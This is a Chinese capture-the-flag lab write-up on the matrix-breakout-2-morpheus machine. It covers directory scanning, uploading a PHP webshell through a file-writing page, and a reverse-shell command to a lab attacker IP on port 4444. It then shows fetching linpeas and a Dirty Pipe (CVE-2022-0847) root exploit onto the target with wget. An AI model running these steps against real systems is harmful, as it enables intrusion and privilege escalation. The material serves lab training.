返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >【matrix-breakout-2-morpheus】靶场记录
  • 691
分享到

【matrix-breakout-2-morpheus】靶场记录

php服务器开发语言 2023-09-04 08:09:59 691人浏览 泡泡鱼
摘要

一、信息收集 命令:netdiscover -i eth0 -r 192.168.236.0/24 访问网页,没有发现任何信息 命令:nmap -sV -T4 -A 192.168.236.151

一、信息收集

命令:netdiscover -i eth0 -r 192.168.236.0/24
在这里插入图片描述
访问网页,没有发现任何信息
在这里插入图片描述
命令:nmap -sV -T4 -A 192.168.236.151

发现开放22、80端口
22端口:ssh密码爆破
80端口:网页(没有信息)
81端口:自定义端口号
尝试一些弱口令未进入
在这里插入图片描述

命令:dirb Http://192.168.236.151/

在这里插入图片描述
http://192.168.236.151/robots.txt 没有发现任何信息

在这里插入图片描述

http://192.168.236.151/javascript/Jquery/jquery 也没有发现任何信息
在这里插入图片描述

再使用更厉害的目录扫描工具Gobuster
命令:gobuster dir -u http://192.168.1.35 -w /usr/share/Wordlists/dirbuster/directory-list-2.3-medium.txt -x .PHP,.txt,.html,.zip
在这里插入图片描述
访问:http://192.168.236.151/graffiti.php
在这里插入图片描述
访问:http://192.168.236.151/graffiti.txt 没有其他信息
在这里插入图片描述

二、 渗透测试

针对http://192.168.236.151/graffiti.php
发现上传什么,就会保存为为什么
在这里插入图片描述

第一种方法:上传一句话木马,并用蚁剑连接

在这里插入图片描述
在这里插入图片描述
message为一句话木马的url编码,这里我们利用burp抓包修改为attack.php上传:
在这里插入图片描述

上传成功,利用蚁剑连接,url:http://192.168.236.151/attack.php 密码:attack
在这里插入图片描述

连接成功
在这里插入图片描述
打开蚁剑中的终端:低权限
在这里插入图片描述

第二种方法:上传反弹shell语句,利用kali监听

命令:& /dev/tcp/192.168.236.128/4444 0>&1'"); ?>

在这里插入图片描述
这里在网页中上传反弹shell命令,另存为fuck.php
在这里插入图片描述

kali监听4444端口,网页访问:http://192.168.236.151/fuck.php
在这里插入图片描述

监听成功,但是低权限
在这里插入图片描述

三、提权

这里使用一种新的工具,可在内网中扫描内网主机的信息,包括IP,存在的漏洞等敏感信息
linux提权脚本:linpeas
枚举linux操作系统几乎所有的可提权项
首先下载至kali机:利用wget命令进行下载
利用wget

kali机开启http服务:python3 -m http.server 8080

在这里插入图片描述
在被攻击机中利用wget下载:
命令:wget http://192.168.236.128:8080/linpeas_linux_amd64

在这里插入图片描述
下载成功
在这里插入图片描述

先赋权,再执行:
命令:chmod +x linpeas_linux_amd64
命令:./linpeas_linux_amd64

在这里插入图片描述扫描信息包括可能存在的漏洞,系统版本,网卡信息等

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这里使用: CVE-2022-0847进行提权
首先下载:命令:git clone https://GitHub.com/imfiver/CVE-2022-0847.git
在这里插入图片描述

被攻击机利用wget,下载kali上的可执行文件:
命令:wget http://192.168.236.128:8080/CVE-2022-0847/Dirty-Pipe.sh
在这里插入图片描述
下载成功

先赋权,再执行Dirty-Pipe.sh
在这里插入图片描述

在这里插入图片描述
提权成功

四、总结

除了dirb扫描目录,还要学会gobuster ffuf工具进行强力的目录扫描
ffuf扫描:ffuf -u http://IP/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
2、linux内网强力扫描工具:linpeas工具的使用

来源地址:https://blog.csdn.net/weixin_46411728/article/details/129034062

--结束END--

本文标题: 【matrix-breakout-2-morpheus】靶场记录

本文链接: https://lsjlt.com/news/393186.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作